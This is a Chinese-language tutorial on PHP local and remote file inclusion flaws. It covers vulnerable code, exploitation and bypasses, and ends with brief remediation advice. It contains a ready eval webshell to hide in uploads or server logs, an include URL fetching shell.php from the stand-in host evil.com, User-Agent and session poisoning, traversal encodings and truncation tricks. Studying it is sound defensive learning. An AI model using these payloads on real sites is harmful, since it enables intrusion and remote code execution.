檔案包含漏洞小結
介紹
檔案包含漏洞屬於程式碼注入漏洞,為了減少重複程式碼的編寫,引入了檔案包含函式,透過檔案包含函式將檔案包含進來,直接使用包含檔案的程式碼;簡單來說就是一個檔案裡面包含另外一個或多個檔案。
但我們除了包含常規的程式碼檔案外,包含的任意字尾檔案都會被當作程式碼執行,因此,如果有允許使用者控制包含檔案路徑的點,那麼則很有可能包含非預期檔案,從而執行非預期的程式碼導致getshell。
幾乎所有的指令碼語言中都會提供檔案包含的功能,但檔案包含漏洞在PHP Web Application中居多,在JSP、ASP中十分少甚至沒有,問題在於語言設計的弊端。因此後續均以PHP為主。
檔案包含漏洞分類
PHP中的檔案包含分為本地檔案包含和遠端檔案包含。
LFI
本地檔案包含 Local File Include (LFI)
所包含檔案內容符合PHP語法規範,任何副檔名都可以被PHP解析。
所包含檔案內容不符合PHP語法規範,會暴露其原始碼(相當於檔案讀取)。
RFI
遠端檔案包含 Remote File Include (RFI)
如果要使用遠端包含功能,首先需要確定PHP是否已經開啟遠端包含功能選項(php預設關閉遠端包含功能:allow_url_include=off),開啟遠端包含功能需要在php.ini配置檔案中修改。
遠端包含與本地包含沒有區別,無非是支援遠端載入,更容易getshell,無論是哪種副檔名,只要遵循PHP語法規範,PHP解析器就會對其解析。
PHP的檔案包含函式
PHP中提供了四個檔案包含的函式,分別是include()、include_once()、require()和require_once()。這四個函式都可以進行檔案包含,但作用並不一樣。
- include:找不到被包含的檔案時只會產生警告,指令碼將繼續執行。
- include_once:和include()語句類似,唯一區別是如果該檔案中的程式碼已經被包含,則不會再次包含。
- require:找不到被包含的檔案時會產生致命錯誤,並停止指令碼。
- require_once:和require()語句類似,唯一區別是如果該檔案中的程式碼已經被包含,則不會再次包含。
漏洞示例程式碼
<?php
// index.php
$file = $_GET[ 'file' ];
include $file
?>
快速啟動一個簡單的解析php的web server
php -S 127.0.0.1:9999
測試:
http://127.0.0.1:9999/index.php?file=/etc/passwd
利用
任意檔案讀取
如果內容不符合php語法,就會直接返回檔案內容,也就等於讀取任意檔案,和任意檔案讀取/下載一樣,就不細說了,敏感檔案路徑可以參考我的另一篇文章:任意檔案下載/讀取
使用PHP封裝協議
PHP帶有很多內建URL風格的封裝協議
php://filter
正常情況下,包含php檔案會直接執行其中的程式碼,但如果我們想獲取到php檔案的原始碼,如config.php,那麼我們可以透過封裝協議php://filter來讀取
http://127.0.0.1:9999/index.php?file=php://filter/read=convert.base64-encode/resource=shell.png
php://input
利用條件:需要開啟allow_url_include=on,對allow_url_fopen不做要求
感覺利用起來都比較雞肋,有需要可以參考:淺談檔案包含漏洞
RFI getshell
如果支援遠端檔案包含,那麼直接http://127.0.0.1:9999/index.php?file=http://evil.com/shell.php即可getshell,因為出現的情況實在是太少了,就不多說了。
LFI+檔案上傳 getshell
這是本地檔案包含漏洞想要getshell的最容易想到的方法之一。
網站存在LFI漏洞,同時存在上傳功能,如上傳頭像、證明資訊等,那麼我們可以上傳一個包含惡意程式碼的任意字尾檔案,如.png
其中.png的內容包含
<?php @eval($_GET['shell']);?>
利用如下:
http://127.0.0.1:9999/index.php?file=shell.png&shell=phpinfo();
[!tip]
可能上傳的檔案中干擾因素過多,導致利用的展示介面很亂,那麼我們可以透過file_put_contents()等函式單獨再寫一個webshell到其他檔案中。
LFI+日誌檔案 getshell
日誌檔案往往會包含我們的請求記錄,如果我們知道日誌的檔案位置,那麼我們就可以將惡意的php程式碼寫入到日誌中,然後再透過檔案包含漏洞就可以執行相關的程式碼。
舉例:
URL訪問
http://127.0.0.1:9999/index.php?file=shell.png&test=<?php @eval($_GET['shell']);?>
payload會被記錄到日誌檔案中,此時日誌檔案如下
我們只需要包含這個日誌檔案,那麼就可以getshell
日誌預設路徑:
可能會有所出入,一切以實際情況為準
名 | 路徑 |
tomcat | /usr/local/tomcat/logs/localhost_access_log.2020-09-21.txt |
apache+linux | /var/log/apache2/access.log |
nginx | /var/log/nginx/access.log |
LFI+/proc/self/environ getshell
在linux中,如果php以cgi方式執行,那麼/proc/self/environ中會包含請求頭中的UA資訊,也就可以getshell
GET lfi.php?file=../../../../../../proc/self/environ HTTP/1.1
User-Agent: <?php phpinfo();?>
可參考:shell via LFI - proc/self/environ method
LFI+phpinfo getshell
除了需要存在一個LFI漏洞外,還需要存在一個phpinfo()頁面
原理:向phpinfo()頁面POST上傳一個檔案,PHP就會將檔案儲存成一個臨時檔案,路徑通常為:/tmp/php[6個隨機字元],這個臨時檔案,在請求結束後就會被刪除。有點類似於條件競爭的操作。
利用工具:https://github.com/diegoalbuquerque/LFI-phpinfo-RCE
利用時需要修改工具中的引數和目標引數適配
LFI+session getshell
很雞肋很雞肋,要求你能控制session才行,一般我們可以先看下session中的內容哪些部分是可控的
php的session檔案的儲存路徑可以在phpinfo的session.save_path看到。
常見的php-session存放位置:
/var/lib/php/sess_PHPSESSID
/var/lib/php/sessions
/tmp/sess_PHPSESSID
/tmp/sessions/sess_PHPSESSID
如果可以控制session的內容,那麼相當於可以控制檔案/var/lib/php/sessions的內容,結合前面的操作就可以直接getshell了
繞過
指定字首
漏洞程式碼:
<?php
$file = $_GET['file'];
include '/var/www/html/'.$file;
?>
繞過方法:
透過../回溯符跳轉到其他目錄,如../../../proc/self/environ
還是透過回溯符../,主要是對內容進行編碼
URL編碼
2次URL編碼
容器/伺服器支援的編碼,..%c0%af == ../,..%c1%9c == ..\
指定字尾
漏洞程式碼:
<?php
$file = $_GET['file'];
include $file.'/test/test.php';
?>
繞過方法:
支援RFI的情況下,可以用?和#來繞過,?後面表示引數,#後面表示錨點,都不會影響到實際的URL
利用偽協議zip://和phar://,以zip為例,先建立一個壓縮包,壓縮目錄為test/test/test.php,然後利用為zip://xxx.zip#test即可
php < 5.2.8的情況下,可以使用長度截斷,只需要不斷的重複./即可,linux下4096位元組時會達到最大值,在window下是256位元組,在達到最大值後,後面的部分將會被省略。如shell.php/./././././省略/./././;注意不能超過容器支援的最大長度,不然會提示GET請求太長。
php < 5.3.4且magic_quotes_gpc=off的情況下,存在00截斷,和上傳中的00截斷類似,讓後端誤以為這是結束符
修復建議
過濾.(點)/(反斜槓)\(反斜槓)等特殊字元
儘量關閉allow_url_include配置
PHP 中使用 open_basedir 配置限制訪問在指定的區域
對需要包含的檔案設定檔案白名單
參考
• 檔案包含漏洞
相關文章
- 什麼是檔案包含漏洞?檔案包含漏洞分類!2021-11-01
- PHP檔案包含小總結2021-05-06PHP
- 檔案包含漏洞(本地包含配合檔案上傳)2018-08-06
- Apache Tomcat檔案包含漏洞分析2020-02-24ApacheTomcat
- "白話"PHP檔案包含漏洞2021-08-06PHP
- PHP漏洞全解————10、PHP檔案包含漏洞2018-07-05PHP
- 檔案包含漏洞(繞過姿勢)2018-06-23
- 實戰篇——檔案包含漏洞一2024-07-07
- 檔案包含漏洞相關知識總結-千鋒教育2022-10-24
- TomcatAJP檔案包含漏洞及線上修復漏洞2020-09-12Tomcat
- 【第九章】檔案包含漏洞2020-07-26
- PHP檔案包含漏洞(利用phpinfo)復現2020-04-24PHP
- PHP本地檔案包含漏洞環境搭建與利用2020-08-19PHP
- 什麼是檔案包含漏洞?會造成什麼危害?2022-09-20
- 檔案包含之包含了Linux檔案描述符2021-05-27Linux
- 滲透測試對檔案包含漏洞網站檢測2019-10-11網站
- 檔案包含22018-08-08
- CTFer——檔案包含2024-03-10
- Shell 檔案包含2019-11-24
- 檔案上傳漏洞總結(全)2021-11-14
- PHP檔案包含 整理2020-06-06PHP
- 3. 檔案上傳漏洞——漏洞總結筆記2024-03-26筆記
- 遠端檔案包含shell2018-08-06
- PHP基礎---檔案包含2020-09-23PHP
- DataCube 漏洞小結2024-05-30
- 漏洞重溫之檔案上傳(總結)2020-08-12
- 本地檔案包含之包含日誌獲取webshell2018-08-06Webshell
- 日誌檔案使用小結(轉)2019-03-15
- 程式碼安全之檔案包含2018-05-31
- 檔案包含之/proc/self/environ2024-04-06
- ClickOnce釋出包含某檔案2020-04-04
- 檔案上傳漏洞2024-08-31
- 檔案包含之銘感目錄2018-08-03
- 利用pearcmd實現裸檔案包含2024-05-11
- C語言 - 標頭檔案包含2024-09-01C語言
- 檔案上傳漏洞全面滲透姿勢總結2021-03-18
- Yaml檔案語法及讀寫小結2019-03-04YAML
- Hive表小檔案合併方法總結2020-10-17Hive